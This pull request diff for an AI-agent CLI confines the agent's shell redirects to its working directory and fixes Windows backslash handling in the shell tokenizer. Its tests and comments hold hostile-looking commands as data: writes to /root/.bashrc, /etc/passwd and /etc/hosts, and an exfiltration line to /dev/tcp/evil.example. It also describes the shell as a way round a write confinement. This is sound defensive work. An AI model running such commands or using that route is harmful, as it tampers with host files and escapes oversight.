### PR TITLE
fix(security): confine shell redirect targets to the workdir (#289)

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -67,7 +67,10 @@ a vulnerability:
   owner-only too.
 - **A repository the agent is pointed at.** File tools resolve symlinks and
   refuse paths that leave the workspace, so a checked-in symlink cannot read
-  your `~/.ssh`. The one exception is deliberate and yours to make: an agent
+  your `~/.ssh`. A shell redirect answers to the same fence: `> path` outside
+  the workspace is refused exactly as `write_file` refuses it, so the shell is
+  not a spelling that gets further. No flag lifts that, `--yolo` included -
+  it is containment rather than permission. The one exception is deliberate and yours to make: an agent
   may declare extra directories under `[read_paths]`, and those declarations
   are inert until your config grants them. When granted they are read-only,
   and every access is checked against the symlink-resolved real path, so a

--- a/crates/leviath-cli/src/daemon/script_host.rs
+++ b/crates/leviath-cli/src/daemon/script_host.rs
@@ -377,6 +377,7 @@ impl ScriptHost for DaemonScriptHost {
             "shell",
             &serde_json::json!({ "command": command }),
             &self.workdir,
+            cfg!(unix),
         ) {
             return Err(refusal);
         }

--- a/crates/leviath-cli/src/daemon/script_host.rs
+++ b/crates/leviath-cli/src/daemon/script_host.rs
@@ -377,7 +377,6 @@ impl ScriptHost for DaemonScriptHost {
             "shell",
             &serde_json::json!({ "command": command }),
             &self.workdir,
-            cfg!(unix),
         ) {
             return Err(refusal);
         }

--- a/crates/leviath-cli/src/daemon/script_host.rs
+++ b/crates/leviath-cli/src/daemon/script_host.rs
@@ -371,6 +371,15 @@ impl ScriptHost for DaemonScriptHost {
         if !self.allow.write_file && crate::shell_keys::writes_a_file(command) {
             return Err(denied("write_file (a shell redirect writes a file)"));
         }
+        // And the containment half, which no `allow` lifts: this host's own
+        // `write_file` is workdir-confined, so its `shell()` redirects are too.
+        if let Some(refusal) = crate::tools::escaping_write_refusal(
+            "shell",
+            &serde_json::json!({ "command": command }),
+            &self.workdir,
+        ) {
+            return Err(refusal);
+        }
         let (shell, flag) = default_shell();
         // With a sandbox, build the command that runs inside the current stage's
         // container / namespace; otherwise run the shell directly on the host
@@ -1050,10 +1059,31 @@ mod tests {
         // write being refused rather than the shell.
         host.shell("echo pwn").expect("a non-writing shell is fine");
 
-        // And with writes permitted, the redirect runs.
+        // And with writes permitted, a redirect *inside the workdir* runs.
         let host = DaemonScriptHost::with_io(all_allowed(), std::env::temp_dir(), io.clone());
-        host.shell("echo pwn > /tmp/x")
+        host.shell("echo pwn > x")
             .expect("a permitted write is not clamped");
+    }
+
+    /// Issue #289. `allow.write_file` answers "may this write at all"; it does
+    /// not answer "may it write *there*". This host's `write_file` is
+    /// workdir-confined, so its `shell()` redirects are too - otherwise a script
+    /// with writes permitted could put a file anywhere on the host.
+    #[test]
+    fn a_script_shell_redirect_stays_inside_the_workdir() {
+        let dir = tempfile::tempdir().unwrap();
+        let io = RecordingIo::arc();
+        let host = DaemonScriptHost::with_io(all_allowed(), dir.path().to_path_buf(), io.clone());
+
+        let err = host
+            .shell("echo pwn > /root/.bashrc")
+            .expect_err("an escaping redirect is refused even with writes allowed");
+        assert!(err.contains("outside the working directory"), "got: {err}");
+
+        // The control: inside the workdir it still runs, so this is the path
+        // being refused rather than every redirect.
+        host.shell("echo ok > inside.txt")
+            .expect("a redirect inside the workdir runs");
     }
 
     #[test]

--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -356,9 +356,12 @@ pub async fn dispatch_tools(
         // outright, so the shell does not get to be the spelling that works.
         // Checked before policy resolution because no policy makes it allowed:
         // this is containment, not permission.
-        if let Some(refusal) =
-            crate::tools::escaping_write_refusal(&tc.name, &tc.arguments, state.builtins.workdir())
-        {
+        if let Some(refusal) = crate::tools::escaping_write_refusal(
+            &tc.name,
+            &tc.arguments,
+            state.builtins.workdir(),
+            cfg!(unix),
+        ) {
             progress(&tc.id, &refusal);
             slots.push((tc.id.clone(), Some(refusal)));
             continue;

--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -352,6 +352,18 @@ pub async fn dispatch_tools(
             continue;
         }
 
+        // A redirect leaving the workdir is a write `write_file` would refuse
+        // outright, so the shell does not get to be the spelling that works.
+        // Checked before policy resolution because no policy makes it allowed:
+        // this is containment, not permission.
+        if let Some(refusal) =
+            crate::tools::escaping_write_refusal(&tc.name, &tc.arguments, state.builtins.workdir())
+        {
+            progress(&tc.id, &refusal);
+            slots.push((tc.id.clone(), Some(refusal)));
+            continue;
+        }
+
         let is_builtin = state.builtin_names.contains(&tc.name);
         // What a scoped approval for *this specific call* would be remembered
         // under. For a shell call that is one key per command in the line, not
@@ -1380,6 +1392,88 @@ mod tests {
         assert_eq!(out[0], ("c1".to_string(), "AAA".to_string()));
         assert!(out[1].0 == "c2" && out[1].1.contains("[denied]"));
         assert_eq!(out[2], ("c3".to_string(), "BBB".to_string()));
+    }
+
+    /// Issue #289, at the layer that actually decides. Everything here is
+    /// permitted - `shell` and `write_file` both `Allow`, which is what
+    /// `--yolo` produces - so the only thing that can stop the write is the
+    /// containment check, and the control proves it is not stopping everything.
+    #[tokio::test]
+    async fn a_shell_redirect_outside_the_workdir_is_refused_before_it_runs() {
+        let dir = tempfile::tempdir().unwrap();
+        let escaped = dir
+            .path()
+            .parent()
+            .expect("tempdir has a parent")
+            .join("leviath-289-probe.txt");
+        let hub = InteractionHub::new();
+        let builtins = Arc::new(leviath_tools::BuiltinTools::new(
+            leviath_tools::ToolContext::new(dir.path().to_path_buf()),
+        ));
+        let builtin_names: HashSet<String> = builtins.names().into_iter().collect();
+        let mut global = HashMap::new();
+        global.insert("shell".to_string(), ToolPolicy::Allow);
+        global.insert("write_file".to_string(), ToolPolicy::Allow);
+        let (script_tools, script_tool_names, script_host) = no_script_fields();
+        let state = Arc::new(AgentToolState {
+            builtins,
+            mcp: Arc::new(Mutex::new(leviath_mcp::ToolExecutor::new())),
+            builtin_names,
+            launch_overrides: Arc::new(HashMap::new()),
+            safe_keys: Arc::new(HashSet::new()),
+            run_allows: Arc::new(Mutex::new(HashSet::new())),
+            stage_allows: Arc::new(StdMutex::new(HashSet::new())),
+            stage_allows_index: Arc::new(StdMutex::new(None)),
+            stage_perms: Arc::new(StdMutex::new(HashMap::new())),
+            stage_perms_by_index: Arc::new(Vec::new()),
+            stage_required: Arc::new(StdMutex::new(HashSet::new())),
+            stage_required_by_index: Arc::new(Vec::new()),
+            agent_perms: Arc::new(HashMap::new()),
+            global_perms: Arc::new(global),
+            blueprint_may_loosen: false,
+            interaction: hub.backend_for("agent-a"),
+            unattended: false,
+            stage_name: Arc::new(StdMutex::new("main".to_string())),
+            subagent: None,
+            sandbox: None,
+            script_tools,
+            script_tool_names,
+            script_host,
+            dynamic: None,
+        });
+
+        let out = dispatch_tools(
+            state,
+            vec![
+                call(
+                    "c1",
+                    "shell",
+                    serde_json::json!({
+                        "command": format!("echo pwn > {}", escaped.display())
+                    }),
+                ),
+                call(
+                    "c2",
+                    "shell",
+                    serde_json::json!({ "command": "echo ok > inside.txt" }),
+                ),
+            ],
+            noop_progress(),
+        )
+        .await;
+
+        assert_eq!(out.len(), 2);
+        let refused = out[0].1.clone();
+        let allowed = out[1].1.clone();
+        assert!(
+            refused.contains("outside the working directory"),
+            "{refused}"
+        );
+        // Refused *before it runs*, which the message alone would not prove.
+        assert!(!escaped.exists(), "the escaping write was executed anyway");
+        // The control: the same permissions write happily inside the workdir.
+        let wrote_inside = dir.path().join("inside.txt").exists();
+        assert!(wrote_inside, "{allowed}");
     }
 
     #[tokio::test]

--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -356,12 +356,9 @@ pub async fn dispatch_tools(
         // outright, so the shell does not get to be the spelling that works.
         // Checked before policy resolution because no policy makes it allowed:
         // this is containment, not permission.
-        if let Some(refusal) = crate::tools::escaping_write_refusal(
-            &tc.name,
-            &tc.arguments,
-            state.builtins.workdir(),
-            cfg!(unix),
-        ) {
+        if let Some(refusal) =
+            crate::tools::escaping_write_refusal(&tc.name, &tc.arguments, state.builtins.workdir())
+        {
             progress(&tc.id, &refusal);
             slots.push((tc.id.clone(), Some(refusal)));
             continue;

--- a/crates/leviath-cli/src/shell_keys.rs
+++ b/crates/leviath-cli/src/shell_keys.rs
@@ -306,6 +306,33 @@ pub fn writes_a_file(command: &str) -> bool {
     })
 }
 
+/// Every literal path `command` redirects a write to.
+///
+/// [`writes_a_file`] answers whether to clamp by the write policy; this answers
+/// *where*, so a caller can hold a redirect to the same workspace confinement
+/// `write_file` enforces.
+///
+/// Discarded targets (`/dev/null` and friends) are absent because they write
+/// nothing anyone can read back. **Unreadable** targets are absent too, and that
+/// is the one asymmetry worth stating: `> $OUT` names a path only the shell will
+/// know, so there is nothing to check it against. Those are already ungrantable
+/// by [`writes_a_file`] and prompt every time, which is the containment they
+/// get. A line that will not tokenize yields nothing here for the same reason -
+/// it is already treated as writing.
+pub fn write_target_paths(command: &str) -> Vec<String> {
+    let Some(segments) = tokenize(command) else {
+        return Vec::new();
+    };
+    segments
+        .iter()
+        .flat_map(|segment| segment.writes.iter())
+        .filter_map(|t| match classify_write(t) {
+            WriteTarget::Path(p) => Some(p),
+            WriteTarget::Discarded | WriteTarget::Unreadable => None,
+        })
+        .collect()
+}
+
 /// The program half of a key, dropping any folded subcommand or argument.
 ///
 /// This is what makes a safe-command entry cover a family rather than a single

--- a/crates/leviath-cli/src/shell_keys.rs
+++ b/crates/leviath-cli/src/shell_keys.rs
@@ -259,8 +259,17 @@ pub fn command_keys(command: &str) -> Vec<String> {
     let Some(segments) = tokenize(command) else {
         return Vec::new();
     };
+    keys_from_segments(&segments)
+}
+
+/// The keys a tokenized line yields.
+///
+/// Split from [`command_keys`] so a caller that has already tokenized - a test
+/// pinning one shell's escape rule against the other - reads the same
+/// implementation rather than a second copy that could drift from it.
+fn keys_from_segments(segments: &[Segment]) -> Vec<String> {
     let mut keys = BTreeSet::new();
-    for segment in &segments {
+    for segment in segments {
         match segment_key(&segment.words) {
             SegmentKey::Keys(found) => {
                 keys.extend(found.into_iter().map(|k| format!("{KEY_PREFIX}{k}")));
@@ -376,7 +385,27 @@ pub fn is_valid_prefix(entry: &str) -> bool {
 /// nesting is ambiguous), and a heredoc (whose body has its own delimiter
 /// grammar).
 fn tokenize(command: &str) -> Option<Vec<Segment>> {
+    tokenize_for(command, BACKSLASH_ESCAPES)
+}
+
+/// Whether the shell these keys describe reads `\` as an escape character.
+///
+/// It does in `sh`; it does not in `cmd.exe`, where `\` is the path separator.
+/// Reading it wrong is not cosmetic: `cat C:\Users\me\notes.md` was keyed as
+/// `shell:cat C:Usersmenotes.md`, so a Windows user's grants were recorded
+/// against paths that do not exist, and anything comparing a key to a real path
+/// compared the wrong string.
+///
+/// Matched to the platform rather than to the resolved shell. `BuiltinTools`
+/// picks `$SHELL` on Unix and `cmd.exe` on Windows, and a Unix user whose
+/// `$SHELL` is not POSIX-ish is already outside what this parser models.
+const BACKSLASH_ESCAPES: bool = cfg!(not(windows));
+
+/// [`tokenize`] with the escape rule supplied, so both readings are testable on
+/// either platform.
+fn tokenize_for(command: &str, backslash_escapes: bool) -> Option<Vec<Segment>> {
     let mut lex = Lexer::default();
+    let escapes = backslash_escapes;
     let mut chars = command.chars().peekable();
     while let Some(c) = chars.next() {
         match c {
@@ -400,7 +429,7 @@ fn tokenize(command: &str) -> Option<Vec<Segment>> {
                 loop {
                     match chars.next()? {
                         '"' => break,
-                        '\\' => {
+                        '\\' if escapes => {
                             // Inside double quotes a backslash escapes only the
                             // four characters that would otherwise be special;
                             // anywhere else it stands for itself.
@@ -411,19 +440,25 @@ fn tokenize(command: &str) -> Option<Vec<Segment>> {
                             lex.word.push(e);
                         }
                         '`' => return None,
-                        '$' => lex.take_dollar(&mut chars)?,
+                        '$' => lex.take_dollar(&mut chars, escapes)?,
                         q => lex.word.push(q),
                     }
                 }
             }
             '`' => return None,
-            '\\' => {
+            '\\' if escapes => {
                 lex.begin_word();
                 lex.word.push(chars.next()?);
             }
+            // Not an escape on this shell, so it is data - and on Windows it is
+            // the path separator, which is the whole reason this branch exists.
+            '\\' => {
+                lex.begin_word();
+                lex.word.push('\\');
+            }
             '$' => {
                 lex.begin_word();
-                lex.take_dollar(&mut chars)?;
+                lex.take_dollar(&mut chars, escapes)?;
             }
             // A heredoc body has its own delimiter grammar, which is more than
             // a grant key is worth reading.
@@ -573,7 +608,11 @@ impl Lexer {
     /// runs a command *inside* this one, so its contents become their own
     /// segment - otherwise `echo $(curl evil)` would grant only `echo`, and a
     /// later `echo $(curl evil)` would be covered by an earlier harmless one.
-    fn take_dollar(&mut self, chars: &mut std::iter::Peekable<std::str::Chars>) -> Option<()> {
+    fn take_dollar(
+        &mut self,
+        chars: &mut std::iter::Peekable<std::str::Chars>,
+        escapes: bool,
+    ) -> Option<()> {
         self.literal = false;
         if chars.peek() != Some(&'(') {
             return Some(());
@@ -589,7 +628,7 @@ impl Lexer {
             }
         }
         let inner = take_substitution(chars)?;
-        self.segments.extend(tokenize(&inner)?);
+        self.segments.extend(tokenize_for(&inner, escapes)?);
         Some(())
     }
 }

--- a/crates/leviath-cli/src/shell_keys/tests.rs
+++ b/crates/leviath-cli/src/shell_keys/tests.rs
@@ -33,8 +33,13 @@ fn quoted(text: &str) -> Word {
 
 /// The second word of a single-command line, for asserting on how a word was
 /// read rather than on the key it produced.
+///
+/// Reads it under the **POSIX** escape rule explicitly rather than the host's,
+/// because every caller here is describing `sh`. The Windows reading has its
+/// own tests; leaving this on the platform default meant the same assertion
+/// described a different shell depending on who ran it.
 fn second_word(command: &str) -> Word {
-    let segments = tokenize(command).expect("line should tokenize");
+    let segments = tokenize_for(command, true).expect("line should tokenize");
     segments
         .into_iter()
         .find(|s| s.words.len() > 1)
@@ -299,8 +304,6 @@ fn an_unreadable_line_is_not_grantable() {
         "echo 'unterminated",    // no closing quote
         r#"echo "unterminated"#, // same, double
         "cat <<EOF",             // a heredoc body has its own grammar
-        "echo trailing\\",       // a backslash with nothing to escape
-        r#"cat "a\"#,            // the same, inside double quotes
         r#"cat "$(unbalanced""#, // a substitution opened inside a quoted word
         r#"echo $(cat "oops)"#,  // a substitution whose own contents do not read
         "$CMD --flag",           // the program itself is an expansion
@@ -313,6 +316,18 @@ fn an_unreadable_line_is_not_grantable() {
             "{command:?} must not be grantable"
         );
     }
+
+    // Two more, but only on a shell that escapes: there the trailing backslash
+    // swallows the terminator the line was looking for. On `cmd.exe` the same
+    // lines are ordinary, which is what the second half asserts.
+    for command in ["echo trailing\\", r#"cat "a\"#] {
+        assert_eq!(
+            keys_under(command, true),
+            Vec::<String>::new(),
+            "{command:?} must not be grantable on a POSIX shell"
+        );
+    }
+    assert_eq!(keys_under("echo trailing\\", false), ["shell:echo"]);
 }
 
 /// One unreadable command poisons the whole line, rather than the line silently
@@ -333,8 +348,11 @@ fn keys_are_sorted_and_deduped() {
 /// separator does not split the line.
 #[test]
 fn an_escaped_separator_is_not_a_boundary() {
-    assert_eq!(keys(r"echo a\;b"), ["shell:echo"]);
-    assert_eq!(keys(r"cat my\ file"), ["shell:cat my file"]);
+    assert_eq!(keys_under(r"echo a\;b", true), ["shell:echo"]);
+    assert_eq!(keys_under(r"cat my\ file", true), ["shell:cat my file"]);
+    // On a shell that does not escape, the separator is a separator and the
+    // backslash is data - which is `cmd.exe`, and correct there.
+    assert_eq!(keys_under(r"echo a\;b", false), ["shell:b", "shell:echo"]);
 }
 
 /// Inside double quotes a backslash escapes only the four characters that would
@@ -836,6 +854,15 @@ fn the_four_posix_escapes_inside_double_quotes_still_escape() {
     assert_eq!(arg_of(r#"cat "a\$b""#), "a$b");
     assert_eq!(arg_of(r#"cat "a\`b""#), "a`b");
     assert!(second_word(r#"cat "a\$b""#).literal, "not an expansion");
+}
+
+/// The two escapes that make a line *unreadable* are POSIX-only too: a trailing
+/// backslash consumes the terminator it was looking for. On a shell that does
+/// not escape, the same lines are ordinary.
+#[test]
+fn a_trailing_backslash_only_swallows_a_terminator_on_a_posix_shell() {
+    assert_eq!(keys_under(r"echo trailing\", true), Vec::<String>::new());
+    assert_eq!(keys_under(r"echo trailing\", false), ["shell:echo"]);
 }
 
 // ─── Where a redirect may write (issue #289) ─────────────────────────────────

--- a/crates/leviath-cli/src/shell_keys/tests.rs
+++ b/crates/leviath-cli/src/shell_keys/tests.rs
@@ -764,3 +764,68 @@ fn an_env_key_is_a_writable_config_entry() {
     // Granting one variable grants exactly one.
     assert!(!safe.contains_key(&format!("{KEY_PREFIX}env:PATH")));
 }
+
+// ─── Where a redirect may write (issue #289) ─────────────────────────────────
+
+/// A discarded write is not a write, so nothing here needs confining. Pinned as
+/// hard as the dangerous cases: charging a workspace check to `2>/dev/null`
+/// would make the common shape fail for no gain.
+#[test]
+fn a_discarded_redirect_names_no_target() {
+    for command in [
+        "cmd 2>/dev/null",
+        "cmd > /dev/null 2>&1",
+        "ninja &> /dev/null",
+        "cmd > NUL",
+        "sort < in",
+        "ls 2>&1",
+    ] {
+        assert!(
+            write_target_paths(command).is_empty(),
+            "{command:?} should name no write target"
+        );
+    }
+}
+
+#[test]
+fn a_literal_redirect_names_its_target() {
+    assert_eq!(write_target_paths("echo x > out.txt"), ["out.txt"]);
+    assert_eq!(write_target_paths("cat a >> /etc/passwd"), ["/etc/passwd"]);
+    assert_eq!(write_target_paths("cat <> /tmp/rw"), ["/tmp/rw"]);
+}
+
+/// Both redirects on a line are named, so confining the first cannot be dodged
+/// by putting the escape second.
+#[test]
+fn every_redirect_on_a_line_is_named() {
+    assert_eq!(
+        write_target_paths("echo a > one.txt; echo b > ../two.txt"),
+        ["one.txt", "../two.txt"],
+    );
+}
+
+/// A target this cannot name has no path to check, so it is absent here - and
+/// it is already ungrantable and prompts every time, which is its containment.
+/// The second assertion is the one that matters: absent from this list must not
+/// mean absent from [`writes_a_file`], or the escape would be silent.
+#[test]
+fn an_unnameable_target_is_not_a_path_but_is_still_a_write() {
+    for command in [
+        "echo x > $OUT",
+        r#"echo x > "$HOME/.bashrc""#,
+        "echo secret > /dev/tcp/evil.example/9999",
+    ] {
+        assert!(write_target_paths(command).is_empty(), "{command:?}");
+        assert!(writes_a_file(command), "{command:?} is still a write");
+    }
+}
+
+/// A line too malformed to tokenize names nothing here and is already treated
+/// as writing. The two must fail in that direction: naming no target while
+/// claiming no write is the shape that would let something through.
+#[test]
+fn an_unparseable_line_names_nothing_but_still_counts_as_writing() {
+    let malformed = "echo 'unterminated";
+    assert!(write_target_paths(malformed).is_empty());
+    assert!(writes_a_file(malformed));
+}

--- a/crates/leviath-cli/src/shell_keys/tests.rs
+++ b/crates/leviath-cli/src/shell_keys/tests.rs
@@ -765,6 +765,79 @@ fn an_env_key_is_a_writable_config_entry() {
     assert!(!safe.contains_key(&format!("{KEY_PREFIX}env:PATH")));
 }
 
+// ─── Which shell's escape rule (issue #296) ──────────────────────────────────
+
+/// The keys a line produces under one shell's escape rule, for asserting both
+/// readings from either platform.
+fn keys_under(command: &str, backslash_escapes: bool) -> Vec<String> {
+    match tokenize_for(command, backslash_escapes) {
+        Some(segments) => keys_from_segments(&segments),
+        None => Vec::new(),
+    }
+}
+
+/// The bug this rule exists for. `cmd.exe` does not read `\` as an escape, so a
+/// Windows path must survive tokenizing intact - the POSIX reading turns
+/// `C:\Users\me\notes.md` into `C:Usersmenotes.md`, which is a path nothing on
+/// the machine has, and every grant keyed on it was a grant for a file that
+/// does not exist.
+#[test]
+fn a_windows_path_survives_when_the_shell_does_not_escape() {
+    let cmd = r"cat C:\Users\me\notes.md";
+    assert_eq!(keys_under(cmd, false), [r"shell:cat C:\Users\me\notes.md"]);
+    // And the POSIX reading, which is what shipped, mangles it.
+    assert_eq!(keys_under(cmd, true), ["shell:cat C:Usersmenotes.md"]);
+}
+
+/// The same asymmetry where it decides a *write*, which is what made it visible.
+#[test]
+fn a_windows_redirect_target_survives_when_the_shell_does_not_escape() {
+    let Some(segments) = tokenize_for(r"echo x > C:\tmp\out.txt", false) else {
+        panic!("should tokenize")
+    };
+    let target = segments
+        .iter()
+        .flat_map(|s| s.writes.iter())
+        .next()
+        .expect("a write target");
+    assert_eq!(target.text, r"C:\tmp\out.txt");
+}
+
+/// The POSIX reading is unchanged where it applies - an escaped space is still
+/// one word, and an escaped separator still is not a boundary.
+#[test]
+fn the_posix_escape_reading_is_untouched() {
+    assert_eq!(keys_under(r"cat my\ file", true), ["shell:cat my file"]);
+    assert_eq!(keys_under(r"echo a\;b", true), ["shell:echo"]);
+}
+
+/// Inside double quotes the two readings already agreed, and it is worth
+/// pinning why: POSIX escapes only `$`, `"`, `\` and a backtick there, so a
+/// backslash before anything else already stood for itself. A quoted Windows
+/// path was never the broken case - the unquoted one was.
+#[test]
+fn a_quoted_windows_path_reads_the_same_either_way() {
+    let word_of = |escapes: bool| {
+        tokenize_for(r#"cat "C:\Users\me""#, escapes)
+            .expect("tokenizes")
+            .swap_remove(0)
+            .words
+            .swap_remove(1)
+            .text
+    };
+    assert_eq!(word_of(false), r"C:\Users\me");
+    assert_eq!(word_of(true), r"C:\Users\me");
+}
+
+/// The four characters POSIX *does* escape inside double quotes still escape,
+/// so widening the rule did not quietly turn `"\$HOME"` back into an expansion.
+#[test]
+fn the_four_posix_escapes_inside_double_quotes_still_escape() {
+    assert_eq!(arg_of(r#"cat "a\$b""#), "a$b");
+    assert_eq!(arg_of(r#"cat "a\`b""#), "a`b");
+    assert!(second_word(r#"cat "a\$b""#).literal, "not an expansion");
+}
+
 // ─── Where a redirect may write (issue #289) ─────────────────────────────────
 
 /// A discarded write is not a write, so nothing here needs confining. Pinned as

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -313,6 +313,48 @@ pub fn clamp_by_effect(
     policy
 }
 
+/// Refuse a shell call whose redirect writes outside the working directory, or
+/// `None` when every literal target it names stays inside.
+///
+/// [`clamp_by_effect`] answers "which policy governs this write" and is a
+/// separate question from "is this path allowed at all". Folding them together
+/// would hide the second one behind the first's name, so they stay apart.
+///
+/// **Refusal, not a prompt.** `write_file` does not prompt for a path outside
+/// the workdir, it refuses, and this is the same write. Prompting would also be
+/// unusable where it matters: the case this closes needs `write_file` to have
+/// resolved to `Allow`, which in practice means `--yolo`, and
+/// [`ToolPolicy::Ask`] blocks until answered - an unattended run would park in
+/// `WaitingInput` holding its slot rather than being protected.
+///
+/// The message names the offending path so the model can retry inside the
+/// workspace instead of guessing which part of its line was refused.
+pub fn escaping_write_refusal(
+    tool_name: &str,
+    arguments: &serde_json::Value,
+    workdir: &std::path::Path,
+) -> Option<String> {
+    if leviath_tools::canonical_tool_name(tool_name) != "shell" {
+        return None;
+    }
+    let command = arguments.get("command").and_then(|v| v.as_str())?;
+    let escaping = crate::shell_keys::write_target_paths(command)
+        .into_iter()
+        .find(|target| {
+            let joined = match std::path::Path::new(target).is_absolute() {
+                true => std::path::PathBuf::from(target),
+                false => workdir.join(target),
+            };
+            !leviath_core::resolves_within(&joined, workdir)
+        })?;
+    Some(format!(
+        "[denied] Shell redirect writes to '{escaping}', which is outside the working directory \
+         ({}). The `write_file` tool refuses the same path; a redirect is not a way around it. \
+         Write inside the workspace instead.",
+        workdir.display()
+    ))
+}
+
 /// Tools a blueprint may declare *more* permissively than the built-in default
 /// without the user opting in.
 ///
@@ -755,6 +797,93 @@ mod policy_tests {
 
     fn allow() -> ToolPolicy {
         ToolPolicy::Allow
+    }
+
+    // ─── Redirect confinement (issue #289) ───────────────────────────────────
+
+    /// The asymmetry this closes. Under `--yolo` the write policy resolves to
+    /// `Allow`, so the clamp above passes the call through - and the target was
+    /// then never checked, while `write_file` on the same path is refused by
+    /// `resolve_within`. The shell was the spelling that worked.
+    #[test]
+    fn a_redirect_outside_the_workdir_is_refused() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        for command in [
+            "echo pwn > /root/.bashrc",
+            "cat notes.md > ../escaped.txt",
+            "echo x >> ../../etc/hosts",
+        ] {
+            let refusal = escaping_write_refusal("shell", &shell_call(command), dir.path());
+            assert!(
+                refusal.is_some(),
+                "{command:?} writes outside the workdir and must be refused"
+            );
+            let refusal = refusal.expect("just asserted");
+            assert!(
+                refusal.contains("outside the working directory"),
+                "{refusal}"
+            );
+        }
+    }
+
+    /// The control. Without it the test above passes against a version that
+    /// refuses every redirect, which would break every agent that writes a file.
+    #[test]
+    fn a_redirect_inside_the_workdir_is_allowed() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        for command in [
+            "echo x > out.txt",
+            "echo x > sub/dir/out.txt",
+            "cat a >> ./notes.md",
+            // A discarded write names no path at all.
+            "ninja > /dev/null 2>&1",
+            "cat a 2>/dev/null",
+            // Not a shell call, so not this function's business.
+            "ls",
+        ] {
+            assert_eq!(
+                escaping_write_refusal("shell", &shell_call(command), dir.path()),
+                None,
+                "{command:?} stays inside and must not be refused"
+            );
+        }
+    }
+
+    /// An absolute path *into* the workdir is inside it, so the check cannot be
+    /// a naive "is it absolute" test.
+    #[test]
+    fn an_absolute_path_into_the_workdir_is_allowed() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let inside = dir.path().join("out.txt");
+        let command = format!("echo x > {}", inside.display());
+        assert_eq!(
+            escaping_write_refusal("shell", &shell_call(&command), dir.path()),
+            None
+        );
+    }
+
+    /// The alias is the same tool, and a non-shell tool is not this check's
+    /// business - `write_file` has its own confinement.
+    #[test]
+    fn the_refusal_covers_the_alias_and_ignores_other_tools() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        assert!(
+            escaping_write_refusal("bash", &shell_call("echo x > /root/.bashrc"), dir.path())
+                .is_some()
+        );
+        assert_eq!(
+            escaping_write_refusal(
+                "write_file",
+                &serde_json::json!({ "path": "/root/.bashrc", "content": "x" }),
+                dir.path()
+            ),
+            None
+        );
+        // A shell call with no `command` argument names nothing to check.
+        assert_eq!(
+            escaping_write_refusal("shell", &serde_json::json!({}), dir.path()),
+            None
+        );
     }
 
     /// The property this exists for: a model that finds `write_file` refused

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -330,29 +330,16 @@ pub fn clamp_by_effect(
 /// The message names the offending path so the model can retry inside the
 /// workspace instead of guessing which part of its line was refused.
 ///
-/// # `shell_escapes_backslash`
-///
-/// Pass `cfg!(unix)`. It says whether the platform's shell reads `\` the way
-/// [`crate::shell_keys`]'s tokenizer does, and the check is skipped when it does
-/// not - because then the path this would judge is not the path the shell will
-/// open.
-///
-/// On Windows the shell is `cmd.exe`, where `\` is a path separator; the
-/// tokenizer treats it as a POSIX escape, so `> C:\Users\me\out.txt` reaches
-/// here as `C:Usersmeout.txt`. CI caught that as a *false denial* of a write
-/// inside the workspace, and the same mismatch could as easily mask an escaping
-/// one. Judging a misread path is worse than not judging it, so Windows keeps
-/// exactly the protection it had before this check existed - the `write_file`
-/// policy clamp, which reads no paths and is unaffected. Tracked in #296.
+/// Reads the target through [`crate::shell_keys`], which knows whether the
+/// platform's shell treats `\` as an escape - so `> C:\Users\me\out.txt` on
+/// Windows is judged as the path `cmd.exe` will actually open, rather than the
+/// `C:Usersmeout.txt` a POSIX reading produces. That mismatch shipped once and
+/// CI caught it denying a write *inside* the workspace.
 pub fn escaping_write_refusal(
     tool_name: &str,
     arguments: &serde_json::Value,
     workdir: &std::path::Path,
-    shell_escapes_backslash: bool,
 ) -> Option<String> {
-    if !shell_escapes_backslash {
-        return None;
-    }
     if leviath_tools::canonical_tool_name(tool_name) != "shell" {
         return None;
     }
@@ -832,7 +819,7 @@ mod policy_tests {
             "cat notes.md > ../escaped.txt",
             "echo x >> ../../etc/hosts",
         ] {
-            let refusal = escaping_write_refusal("shell", &shell_call(command), dir.path(), true);
+            let refusal = escaping_write_refusal("shell", &shell_call(command), dir.path());
             assert!(
                 refusal.is_some(),
                 "{command:?} writes outside the workdir and must be refused"
@@ -861,7 +848,7 @@ mod policy_tests {
             "ls",
         ] {
             assert_eq!(
-                escaping_write_refusal("shell", &shell_call(command), dir.path(), true),
+                escaping_write_refusal("shell", &shell_call(command), dir.path()),
                 None,
                 "{command:?} stays inside and must not be refused"
             );
@@ -871,50 +858,16 @@ mod policy_tests {
     /// An absolute path *into* the workdir is inside it, so the check cannot be
     /// a naive "is it absolute" test.
     ///
-    /// Unix-only because the path is built from a real temp directory: on
-    /// Windows those separators are backslashes, which the tokenizer eats as
-    /// POSIX escapes. That is the mismatch the flag exists for, and the test
-    /// below is its cross-platform statement.
-    #[cfg(unix)]
+    /// Built from a real temp directory, so on Windows it carries real
+    /// backslashes - which is the case that used to fail, before the tokenizer
+    /// learned that `cmd.exe` does not read them as escapes.
     #[test]
     fn an_absolute_path_into_the_workdir_is_allowed() {
         let dir = tempfile::tempdir().expect("tempdir");
         let inside = dir.path().join("out.txt");
         let command = format!("echo x > {}", inside.display());
         assert_eq!(
-            escaping_write_refusal("shell", &shell_call(&command), dir.path(), true),
-            None
-        );
-    }
-
-    /// The reason the flag exists, stated on every platform.
-    ///
-    /// `cmd.exe` does not read `\` as an escape, but the tokenizer does, so
-    /// `> C:\Users\me\out.txt` arrives here as `C:Usersmeout.txt` - a path the
-    /// shell will never open. CI caught that denying a write *inside* the
-    /// workspace, and the same mismatch could mask an escaping one. Judging a
-    /// misread path is worse than not judging it.
-    #[test]
-    fn a_shell_that_does_not_escape_backslashes_is_not_judged() {
-        let dir = tempfile::tempdir().expect("tempdir");
-        // Refused when the tokenizer and the shell agree...
-        assert!(
-            escaping_write_refusal(
-                "shell",
-                &shell_call("echo x > /root/.bashrc"),
-                dir.path(),
-                true
-            )
-            .is_some()
-        );
